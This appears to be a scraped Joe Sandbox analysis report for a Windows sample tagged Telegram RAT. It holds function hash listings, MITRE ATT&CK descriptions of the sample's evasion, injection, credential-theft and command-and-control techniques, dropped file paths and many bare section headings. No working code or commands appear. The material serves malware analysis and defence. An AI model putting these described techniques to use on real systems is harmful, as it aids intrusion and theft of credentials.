Function 00007FFD9B77A822 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1730002206.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b770000_JFFjXW16yR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e286d72b86c5c7384dca109aac5da3fd9ad4ef01a984bb0b0582f8d42a1a9a02
Instruction ID: d63c287a9a30f604392122bbccc1c71bc11678d92c5b3dedb909ca9e64625caa
Opcode Fuzzy Hash: e286d72b86c5c7384dca109aac5da3fd9ad4ef01a984bb0b0582f8d42a1a9a02
Instruction Fuzzy Hash: C5E0ED30E0A62D8FEBA4E694C45477872A1EF99300F1242B5C40DD72F1CE78AD419B50

Function 00007FFD9B7765CA Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1730002206.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b770000_JFFjXW16yR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77bcba09a08a20c1372ef027f93ab0b63104f01363beec45541d1b8628a3b99f
Instruction ID: fac0d5f50617b3c50694f53e3f54615d7911989419ee5040e432b17a9d41541f
Opcode Fuzzy Hash: 77bcba09a08a20c1372ef027f93ab0b63104f01363beec45541d1b8628a3b99f
Instruction Fuzzy Hash: C9E0863170D70D8BE760A55484A46B83252EBD0324F120375C009C31F8EEB8E6519680

Function 00007FFD9B770CE4 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1730002206.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b770000_JFFjXW16yR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e288ffbf390cd8e6d95f4707f7d8a04c5d1f01e9232a8a1f0c40fde02e294d9
Instruction ID: 9051bfa2fa0f9d1926b322e876b3994b6252c274e864dfba2668d34f8ab475a6
Opcode Fuzzy Hash: 1e288ffbf390cd8e6d95f4707f7d8a04c5d1f01e9232a8a1f0c40fde02e294d9
Instruction Fuzzy Hash: F3E01270B0A35B8AEF58DB94C8A54FE7261FB51711B014B3ED416D72E0DBB466408680

Function 00007FFD9B77BCBB Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1730002206.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b770000_JFFjXW16yR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8c1d56541b9b4e34bacbd6d0c827707aeb2679c09856c20a1d081b4ee6884b6
Instruction ID: 4f52309cdc1ea8449354406f6f41bff1d96f4da44a9800110226d0b1183505eb
Opcode Fuzzy Hash: c8c1d56541b9b4e34bacbd6d0c827707aeb2679c09856c20a1d081b4ee6884b6
Instruction Fuzzy Hash: A9E04F30A0961D4FDBA4E79484606A973A1EF99300F1101B5840DAB2A1CD74AD42CB40

Function 00007FFD9B778308 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1730002206.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b770000_JFFjXW16yR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702329498a988cb9ebd792358af06c1e45652ed7743048ba0dfca382b4df9d12
Instruction ID: c686c2c9ce1d18e1829f4fa9427408e19f45f091e7acec29e8357bf766d695f1
Opcode Fuzzy Hash: 702329498a988cb9ebd792358af06c1e45652ed7743048ba0dfca382b4df9d12
Instruction Fuzzy Hash: 0FC04C71A09709CFD768DA54D0A076832A1FF48305F25057CE54E872F6CA7AAD52C704

Function 00007FFD9B776ECD Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1730002206.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b770000_JFFjXW16yR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bd99c72cb8416f8f252ab9901e03be2488a7816fd0c7757fce1e4868eab2345
Instruction ID: 93a6a870f0ca80dc4bd7428829c8dfe772c5f08f3b6f2b28c66bae16b46128d4
Opcode Fuzzy Hash: 5bd99c72cb8416f8f252ab9901e03be2488a7816fd0c7757fce1e4868eab2345
Instruction Fuzzy Hash: 21C0807060D345CBD334EA18C19077573D0EB50304F024038D28EC3271DD34ED418740

Non-executed Functions

Function 00007FFD9B773BFB Relevance: .4, Instructions: 405COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1730002206.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b770000_JFFjXW16yR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a37efdb560ab8340d852cadc3a22fee4c1995fc49b37737faa0bbeb424a75e75
Instruction ID: e93ae142963d92113dd38dd0df13c9198e35b5941688b7b9e37c88df980bfd9b
Opcode Fuzzy Hash: a37efdb560ab8340d852cadc3a22fee4c1995fc49b37737faa0bbeb424a75e75
Instruction Fuzzy Hash: A5A1281BB496760AD31476BDF8A19FDA740DF90372B0446B7E39DCA0D38E04604A87E5

Function 00007FFD9B773798 Relevance: .3, Instructions: 286COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1730002206.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b770000_JFFjXW16yR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 183540dd44ae70c1b6b39aa5e2716dc2a1deadc781ab70cc7cce0efdb9af8a3a
Instruction ID: 4a732e18636cace09c278b63d5e1484f007c9e2aaddebcc60239f707554a260f
Opcode Fuzzy Hash: 183540dd44ae70c1b6b39aa5e2716dc2a1deadc781ab70cc7cce0efdb9af8a3a
Instruction Fuzzy Hash: C5715D2BB086364AD318B7BDB5A69FDB740DF903757044ABBE2DACD0C78F14608686D4

Function 00007FFD9B773FFA Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1730002206.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b770000_JFFjXW16yR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3955d9028bc6b38bd4086ef9bcc130cfaa74c9542ce05a63c7131eccc11268d
Instruction ID: e22af5ccc35168777f0fe61aea2adcaf4c4bbf41f7249d1ab00d864a7156e89f
Opcode Fuzzy Hash: d3955d9028bc6b38bd4086ef9bcc130cfaa74c9542ce05a63c7131eccc11268d
Instruction Fuzzy Hash: CD51D51B7889214DE30873BDB9A59FE7741DF90375B0846B7F25ECD0CB4E0864868AD5

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report JFFjXW16yR.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\JFFjXW16yR.exe.log

C:\Users\user\AppData\Local\Temp\tmp18BD.tmp.dat

C:\Users\user\AppData\Local\Temp\tmp18ED.tmp.dat

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\loginFile.db

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
JFFjXW16yR.exe